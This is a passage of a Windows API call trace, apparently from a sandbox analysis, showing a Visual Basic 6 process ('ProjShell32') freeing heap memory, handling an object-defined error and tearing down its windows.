hHeap=0x2c70000) returned 1 [0165.463] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.463] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.463] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.464] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.464] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.464] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.464] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.464] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.464] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.464] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.464] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.464] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.464] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.464] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.464] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.464] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.464] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.464] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.465] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.465] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.465] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.465] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.465] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.465] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.465] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.465] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.465] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.465] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.465] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.465] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.465] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.465] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.465] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.465] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.466] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.466] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.466] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.466] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.466] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.466] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.466] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.466] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.466] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.466] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.466] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.466] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.466] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.466] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.467] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.467] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c82b58 [0165.467] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x4) returned 0x2c8bcd0 [0165.467] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c81d20 [0165.467] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d20 | out: hHeap=0x2c70000) returned 1 [0165.467] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcd0 | out: hHeap=0x2c70000) returned 1 [0165.467] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b58 | out: hHeap=0x2c70000) returned 1 [0165.467] IMalloc:Alloc (This=0x76da66bc, cb=0x140) returned 0x10a44c0 [0165.467] IMalloc:GetSize (This=0x76da66bc, pv=0x10a44c0) returned 0x140 [0165.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0165.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x109974c, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0165.468] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f670) [0165.469] CreateErrorInfo (in: pperrinfo=0x28f030 | out: pperrinfo=0x28f030*=0x109c55c) returned 0x0 [0165.475] LoadStringA (in: hInstance=0x72940000, uID=0x2738, lpBuffer=0x28eb74, cchBufferMax=500 | out: lpBuffer="Application-defined or object-defined error") returned 0x2b [0165.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Application-defined or object-defined error", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0165.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Application-defined or object-defined error", cbMultiByte=-1, lpWideCharStr=0x108fc44, cchWideChar=44 | out: lpWideCharStr="Application-defined or object-defined error") returned 44 [0165.477] ICreateErrorInfo:SetGuid (This=0x109c55c, rguid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0165.477] ICreateErrorInfo:SetSource (This=0x109c55c, szSource="ProjShell32") returned 0x0 [0165.478] ICreateErrorInfo:SetDescription (This=0x109c55c, szDescription="Application-defined or object-defined error") returned 0x0 [0165.478] ICreateErrorInfo:SetHelpFile (This=0x109c55c, szHelpFile=0x0) returned 0x0 [0165.478] ICreateErrorInfo:SetHelpContext (This=0x109c55c, dwHelpContext=0xf429f) returned 0x0 [0165.478] IUnknown:QueryInterface (in: This=0x109c55c, riid=0x729706e0*(Data1=0x1cf2b120, Data2=0x547d, Data3=0x101b, Data4=([0]=0x8e, [1]=0x65, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2b, [6]=0xd1, [7]=0x19)), ppvObject=0x28f02c | out: ppvObject=0x28f02c*=0x109c558) returned 0x0 [0165.478] SetErrorInfo (dwReserved=0x0, perrinfo=0x109c558) returned 0x0 [0165.478] IUnknown:Release (This=0x109c558) returned 0x2 [0165.479] IUnknown:Release (This=0x109c55c) returned 0x1 [0165.479] FileSystemObject:IUnknown:Release (This=0x13a2be0) returned 0x0 [0165.479] FileSystemObject:IUnknown:Release (This=0x13a2cec) returned 0x0 [0165.479] FileSystemObject:IUnknown:Release (This=0x13a2c3c) returned 0x0 [0165.480] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x28fa4c | out: pperrinfo=0x28fa4c*=0x109c558) returned 0x0 [0165.480] IErrorInfo:GetSource (in: This=0x109c558, pBstrSource=0x2c71704 | out: pBstrSource=0x2c71704*="ProjShell32") returned 0x0 [0165.481] IErrorInfo:GetDescription (in: This=0x109c558, pBstrDescription=0x2c71708 | out: pBstrDescription=0x2c71708*="Application-defined or object-defined error") returned 0x0 [0165.481] IErrorInfo:GetHelpFile (in: This=0x109c558, pBstrHelpFile=0x2c7170c | out: pBstrHelpFile=0x2c7170c*=0x0) returned 0x0 [0165.481] IErrorInfo:GetHelpContext (in: This=0x109c558, pdwHelpContext=0x2c71710 | out: pdwHelpContext=0x2c71710*=0xf429f) returned 0x0 [0165.481] IUnknown:Release (This=0x109c558) returned 0x0 [0165.481] GetCurrentThreadId () returned 0xba4 [0165.482] GetCurrentThreadId () returned 0xba4 [0165.482] GetCurrentThreadId () returned 0xba4 [0165.483] CoDisconnectObject (pUnk=0x10913d8, dwReserved=0x0) returned 0x0 [0165.483] IUnknown:QueryInterface (in: This=0x10913d8, riid=0x76ca3e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f964 | out: ppvObject=0x28f964*=0x0) returned 0x80004002 [0165.483] IUnknown:QueryInterface (in: This=0x10913d8, riid=0x76ca9b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f974 | out: ppvObject=0x28f974*=0x10913f4) returned 0x0 [0165.483] IUnknown:Release (This=0x10913f4) returned 0x3 [0165.483] GetCurrentThreadId () returned 0xba4 [0165.484] GetCurrentThreadId () returned 0xba4 [0165.484] PostMessageA (hWnd=0x103de, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0165.484] GetCurrentThreadId () returned 0xba4 [0165.484] PostMessageA (hWnd=0x103de, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0165.500] GetCurrentThreadId () returned 0xba4 [0165.500] SendMessageA (hWnd=0x103de, Msg=0x1061, wParam=0x0, lParam=0x0) returned 0x0 [0165.500] GetCurrentThreadId () returned 0xba4 [0165.505] GetCapture () returned 0x0 [0165.505] ShowWindow (hWnd=0x103e6, nCmdShow=0) returned 0 [0165.505] IsChild (hWndParent=0x103e8, hWnd=0x103e4) returned 0 [0165.506] GetWindow (hWnd=0x103e8, uCmd=0x5) returned 0x0 [0165.506] GetFocus () returned 0x0 [0165.506] DestroyWindow (hWnd=0x103e8) returned 1 [0165.506] NtdllDefWindowProc_A (hWnd=0x103e8, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.506] NtdllDefWindowProc_A (hWnd=0x103e8, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.507] NtdllDefWindowProc_A (hWnd=0x103e8, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.507] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b2f0 | out: hHeap=0x2c70000) returned 1 [0165.507] IsChild (hWndParent=0x103ea, hWnd=0x103e4) returned 0 [0165.507] GetWindow (hWnd=0x103ea, uCmd=0x5) returned 0x0 [0165.508] GetFocus () returned 0x0 [0165.508] DestroyWindow (hWnd=0x103ea) returned 1 [0165.508] NtdllDefWindowProc_A (hWnd=0x103ea, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.508] NtdllDefWindowProc_A (hWnd=0x103ea, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.509] NtdllDefWindowProc_A (hWnd=0x103ea, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.509] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b3d8 | out: hHeap=0x2c70000) returned 1 [0165.509] IsChild (hWndParent=0x103ec, hWnd=0x103e4) returned 0 [0165.509] GetWindow (hWnd=0x103ec, uCmd=0x5) returned 0x0 [0165.509] GetFocus () returned 0x0 [0165.509] DestroyWindow (hWnd=0x103ec) returned 1 [0165.510] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.510] GetFocus () returned 0x0 [0165.510] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0165.510] GetFocus () returned 0x0 [0165.511] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.511] GetFocus () returned 0x0 [0165.511] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x180a0c4f [0165.511] GetFocus () returned 0x0 [0165.511] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x1 [0165.511] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0165.512] GetFocus () returned 0x0 [0165.512] GetFocus () returned 0x0 [0165.512] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ec, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.512] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b5c0 | out: hHeap=0x2c70000) returned 1 [0165.513] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82938 | out: hHeap=0x2c70000) returned 1 [0165.513] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b4c0 | out: hHeap=0x2c70000) returned 1 [0165.513] IsChild (hWndParent=0x103ee, hWnd=0x103e4) returned 0 [0165.513] GetWindow (hWnd=0x103ee, uCmd=0x5) returned 0x0 [0165.513] GetFocus () returned 0x0 [0165.513] DestroyWindow (hWnd=0x103ee) returned 1 [0165.513] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.514] GetFocus () returned 0x0 [0165.514] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0165.514] GetFocus () returned 0x0 [0165.514] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.514] GetFocus () returned 0x0 [0165.515] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x180a0c4f [0165.515] GetFocus () returned 0x0 [0165.515] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x1 [0165.515] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0165.515] GetFocus () returned 0x0 [0165.515] GetFocus () returned 0x0 [0165.515] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103ee, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.520] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b6d0 | out: hHeap=0x2c70000) returned 1 [0165.521] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82978 | out: hHeap=0x2c70000) returned 1 [0165.521] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b5d0 | out: hHeap=0x2c70000) returned 1 [0165.521] IsChild (hWndParent=0x103f0, hWnd=0x103e4) returned 0 [0165.521] GetWindow (hWnd=0x103f0, uCmd=0x5) returned 0x0 [0165.521] GetFocus () returned 0x0 [0165.521] DestroyWindow (hWnd=0x103f0) returned 1 [0165.521] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.522] GetFocus () returned 0x0 [0165.522] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0165.522] GetFocus () returned 0x0 [0165.522] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.522] GetFocus () returned 0x0 [0165.523] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x180a0c4f [0165.523] GetFocus () returned 0x0 [0165.523] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x1 [0165.523] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0165.523] GetFocus () returned 0x0 [0165.523] GetFocus () returned 0x0 [0165.523] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f0, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.524] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b7e0 | out: hHeap=0x2c70000) returned 1 [0165.524] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c829b8 | out: hHeap=0x2c70000) returned 1 [0165.525] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b6e0 | out: hHeap=0x2c70000) returned 1 [0165.525] IsChild (hWndParent=0x103f2, hWnd=0x103e4) returned 0 [0165.525] GetWindow (hWnd=0x103f2, uCmd=0x5) returned 0x0 [0165.525] GetFocus () returned 0x0 [0165.525] DestroyWindow (hWnd=0x103f2) returned 1 [0165.525] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.525] GetFocus () returned 0x0 [0165.525] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0165.526] GetFocus () returned 0x0 [0165.526] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.526] GetFocus () returned 0x0 [0165.526] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x180a0c4f [0165.527] GetFocus () returned 0x0 [0165.527] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x1 [0165.527] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0165.527] GetFocus () returned 0x0 [0165.527] GetFocus () returned 0x0 [0165.527] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103f2, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.528] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b8f0 | out: hHeap=0x2c70000) returned 1 [0165.528] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c829f8 | out: hHeap=0x2c70000) returned 1 [0165.528] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b7f0 | out: hHeap=0x2c70000) returned 1 [0165.528] IsChild (hWndParent=0x103f4, hWnd=0x103e4) returned 0 [0165.528] GetWindow (hWnd=0x103f4, uCmd=0x5) returned 0x0 [0165.529] GetFocus () returned 0x0 [0165.529] DestroyWindow (hWnd=0x103f4) returned 1 [0165.529] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.529] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0165.529] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.530] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x180a0c4f [0165.530] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0165.530] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f4, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.530] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81cd8 | out: hHeap=0x2c70000) returned 1 [0165.530] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82a38 | out: hHeap=0x2c70000) returned 1 [0165.531] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b900 | out: hHeap=0x2c70000) returned 1 [0165.531] IsChild (hWndParent=0x103f6, hWnd=0x103e4) returned 0 [0165.531] GetWindow (hWnd=0x103f6, uCmd=0x5) returned 0x0 [0165.531] GetFocus () returned 0x0 [0165.531] DestroyWindow (hWnd=0x103f6) returned 1 [0165.531] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.531] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0165.536] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.536] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x180a0c4f [0165.536] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0165.536] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f6, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.537] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81cf0 | out: hHeap=0x2c70000) returned 1 [0165.537] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82a78 | out: hHeap=0x2c70000) returned 1 [0165.537] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b9e8 | out: hHeap=0x2c70000) returned 1 [0165.537] IsChild (hWndParent=0x103f8, hWnd=0x103e4) returned 0 [0165.537] GetWindow (hWnd=0x103f8, uCmd=0x5) returned 0x0 [0165.537] GetFocus () returned 0x0 [0165.537] DestroyWindow (hWnd=0x103f8) returned 1 [0165.537] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.538] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0165.538] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.538] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x31, wParam=0x0, lParam=0x0) returned 0x180a0c4f [0165.538] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x30, wParam=0x0, lParam=0x0) returned 0x0 [0165.538] CallWindowProcA (lpPrevWndFunc=0x77adabd3, hWnd=0x103f8, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.539] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81d08 | out: hHeap=0x2c70000) returned 1 [0165.539] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82ab8 | out: hHeap=0x2c70000) returned 1 [0165.539] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bad0 | out: hHeap=0x2c70000) returned 1 [0165.539] IsChild (hWndParent=0x103e6, hWnd=0x103e4) returned 0 [0165.539] GetWindow (hWnd=0x103e6, uCmd=0x5) returned 0x0 [0165.540] DestroyWindow (hWnd=0x103e6) returned 1 [0165.540] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.542] SendMessageA (hWnd=0x103e6, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0165.542] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0165.543] SysReAllocStringLen (in: pbstr=0x28ed5c*=0x0, psz="MSVBVM60.DLL", len=0xc | out: pbstr=0x28ed5c*="MSVBVM60.DLL") returned 1 [0165.543] CharLowerBuffW (in: lpsz="MSVBVM60.DLL", cchLength=0xc | out: lpsz="msvbvm60.dll") returned 0xc [0165.543] GetModuleHandleW (lpModuleName="C:\\Windows\\system32\\MSVBVM60.DLL") returned 0x72940000 [0165.545] SelectObject (hdc=0x5010c57, h=0x18a002e) returned 0x180a0c4f [0165.545] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.546] SelectObject (hdc=0x5010c57, h=0x18a002e) returned 0x18a002e [0165.546] SelectObject (hdc=0x5010c57, h=0x1b00016) returned 0xc300c54 [0165.546] DeleteObject (ho=0xc300c54) returned 1 [0165.546] SelectObject (hdc=0x5010c57, h=0x1900015) returned 0x1900015 [0165.546] SelectObject (hdc=0x5010c57, h=0x1900015) returned 0x1900015 [0165.546] ReleaseDC (hWnd=0x103e6, hDC=0x5010c57) returned 1 [0165.546] NtdllDefWindowProc_A (hWnd=0x103e6, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.546] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b2e0 | out: hHeap=0x2c70000) returned 1 [0165.547] GetFocus () returned 0x0 [0165.547] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c828b8 | out: hHeap=0x2c70000) returned 1 [0165.551] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8b140 | out: hHeap=0x2c70000) returned 1 [0165.551] GetCurrentThreadId () returned 0xba4 [0165.551] PeekMessageA (in: lpMsg=0x28fbb8, hWnd=0x103de, wMsgFilterMin=0x1047, wMsgFilterMax=0x1047, wRemoveMsg=0x0 | out: lpMsg=0x28fbb8) returned 0 [0165.601] PostMessageA (hWnd=0x103de, Msg=0x1047, wParam=0x0, lParam=0x0) returned 1 [0165.601] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8aa38 | out: hHeap=0x2c70000) returned 1 [0165.601] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8a928 | out: hHeap=0x2c70000) returned 1 [0165.601] IMalloc:Free (This=0x76da66bc, pv=0x10913d8) [0165.601] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x1061, wParam=0x0, lParam=0x0) returned 0x0 